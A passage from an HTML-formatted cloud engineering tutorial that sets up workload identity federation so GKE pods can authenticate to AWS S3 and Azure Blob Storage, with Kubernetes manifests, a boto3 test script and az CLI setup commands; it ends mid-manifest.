&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="c1"&gt;# gke-cross-cloud-sa SA is created in Scenario 3.1 above&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;restartPolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Never&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-test&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;sh&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;-c&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
        &lt;span class="s"&gt;pip install --no-cache-dir boto3 &amp;amp;&amp;amp; \&lt;/span&gt;
        &lt;span class="s"&gt;python /app/test_aws_from_gke.py&lt;/span&gt;
    &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AWS_ROLE_ARN&lt;/span&gt;
      &lt;span class="c1"&gt;# Replace ACCOUNT_ID with your AWS account ID&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;arn:aws:iam::YOUR_AWS_ACCOUNT_ID:role/gke-to-aws-role"&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AWS_WEB_IDENTITY_TOKEN_FILE&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/tokens/token&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AWS_REGION&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;us-east-1&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/app&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-token&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/tokens&lt;/span&gt;
      &lt;span class="na"&gt;readOnly&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
    &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-test-code-gke&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-token&lt;/span&gt;
    &lt;span class="na"&gt;projected&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;sources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;serviceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;token&lt;/span&gt;
            &lt;span class="na"&gt;expirationSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3600&lt;/span&gt;
            &lt;span class="na"&gt;audience&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;sts.amazonaws.com"&lt;/span&gt;  &lt;span class="c1"&gt;# must match your AWS OIDC provider audience&lt;/span&gt;

&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-test-code-gke&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;test_aws_from_gke.py&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;# Code will be provided below&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Test Code (Python):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# test_aws_from_gke.py
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_aws_access&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Test AWS S3 access from GKE using OIDC federation&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# SDK automatically uses OIDC credentials from environment variables
&lt;/span&gt;        &lt;span class="n"&gt;s3_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s3&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# List buckets to verify access
&lt;/span&gt;        &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;s3_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_buckets&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;✅ AWS Authentication successful!&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Buckets&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; S3 buckets:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;bucket&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Buckets&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;][:&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  - &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;bucket&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Name&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Get caller identity
&lt;/span&gt;        &lt;span class="n"&gt;sts_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;sts&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;identity&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sts_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get_caller_identity&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;🔐 Authenticated as: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;identity&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Arn&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;
    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;❌ AWS Authentication failed: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;traceback&lt;/span&gt;
        &lt;span class="n"&gt;traceback&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;print_exc&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;test_aws_access&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Success Logs:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you see logs like below for the pod &lt;code&gt;kubectl logs -f -n default gke-aws-test&lt;/code&gt;, it means the GKE to AWS Authentication worked.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;✅ AWS Authentication successful!
Found &amp;lt;number of buckets&amp;gt; S3 buckets:
  - bucket-1
  - bucket-2
  - ...

🔐 Authenticated as: arn:aws:sts::YOUR_AWS_ACCOUNT_ID:assumed-role/gke-to-aws-role/botocore-session-&amp;lt;some random number&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3.3 Authenticating to Azure from GKE
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Setup Steps:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Make sure you have done `az login` and set the subscription before proceeding&lt;/span&gt;

&lt;span class="c"&gt;# 1. Get GKE OIDC issuer&lt;/span&gt;
&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud config get-value project&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;CLUSTER_LOCATION&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"us-central1"&lt;/span&gt;  &lt;span class="c"&gt;# Change to your cluster location&lt;/span&gt;

&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;curl &lt;span class="nt"&gt;-s&lt;/span&gt; https://container.googleapis.com/v1/projects/YOUR_PROJECT_ID/locations/us-central1/clusters/my-gke-cluster/.well-known/openid-configuration | jq &lt;span class="nt"&gt;-r&lt;/span&gt; .issuer&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"OIDC Issuer: &lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# 2. Create Azure AD application&lt;/span&gt;
az ad app create &lt;span class="nt"&gt;--display-name&lt;/span&gt; gke-to-azure-app

&lt;span class="nv"&gt;APP_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az ad app list &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt; gke-to-azure-app &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"[0].appId"&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"App ID: &lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;APP_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create service principal&lt;/span&gt;
az ad sp create &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt;

&lt;span class="c"&gt;# 4. Create federated credential&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; gke-federated-credential.json &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;
{
  "name": "gke-federated-identity",
  "issuer": "&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;",
  "subject": "system:serviceaccount:default:gke-cross-cloud-sa",
  "audiences": [
    "api://AzureADTokenExchange"
  ]
}
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;az ad app federated-credential create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--parameters&lt;/span&gt; gke-federated-credential.json

&lt;span class="c"&gt;# 5. Assign Azure permissions&lt;/span&gt;
&lt;span class="nv"&gt;SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az account show &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="nb"&gt;id&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

az role assignment create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assignee&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt; &lt;span class="s2"&gt;"Storage Blob Data Reader"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--scope&lt;/span&gt; &lt;span class="s2"&gt;"/subscriptions/&lt;/span&gt;&lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# 6. Create resource group (if not exists)&lt;/span&gt;
az group create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; gke-cross-cloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt; eastus &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--subscription&lt;/span&gt; &lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt;

&lt;span class="c"&gt;# 7. Create storage account&lt;/span&gt;
az storage account create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; gkecrosscloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; gke-cross-cloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt; eastus &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--sku&lt;/span&gt; Standard_LRS &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--kind&lt;/span&gt; StorageV2 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--subscription&lt;/span&gt; &lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt;

&lt;span class="c"&gt;# 8. Create blob container&lt;/span&gt;
az storage container create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; test-container &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--account-name&lt;/span&gt; gkecrosscloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--subscription&lt;/span&gt; &lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--auth-mode&lt;/span&gt; login

&lt;span class="c"&gt;# you will need TENANT_ID below&lt;/span&gt;
&lt;span class="nv"&gt;TENANT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az account show &lt;span class="nt"&gt;--query&lt;/span&gt; tenantId &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Kubernetes Manifest:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Submit the manifest below to validate the Scenario 3.3, if authentication is working you will see success logs as shown below -&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# scenario3-3-gke-to-azure.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-azure-test&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="c1"&gt;# gke-cross-cloud-sa SA is created in Scenario 3.1 above&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;restartPolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Never&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-test&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;sh&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;-c&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
        &lt;span class="s"&gt;pip install --no-cache-dir azure-identity azure-storage-blob &amp;amp;&amp;amp; \&lt;/span&gt;
        &lt;span class="s"&gt;python /app/test_azure_from_gke.py&lt;/span&gt;
    &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AZURE_CLIENT_ID&lt;/span&gt;
      &lt;span class="c1"&gt;# Replace with your actual App ID&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;YOUR_APP_ID"&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AZURE_TENANT_ID&lt;/span&gt;
      &lt;span class="c1"&gt;# Replace with your actual Tenant ID (get via: az account show --query tenantId -o tsv)&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;YOUR_TENANT_ID"&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AZURE_FEDERATED_TOKEN_FILE&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/azure/tokens/azure-identity-token&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AZURE_STORAGE_ACCOUNT&lt;/span&gt;
      &lt;span class="c1"&gt;# Replace with your actual storage account name&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;gkecrosscloud"&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/app&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-token&lt;/span&gt;
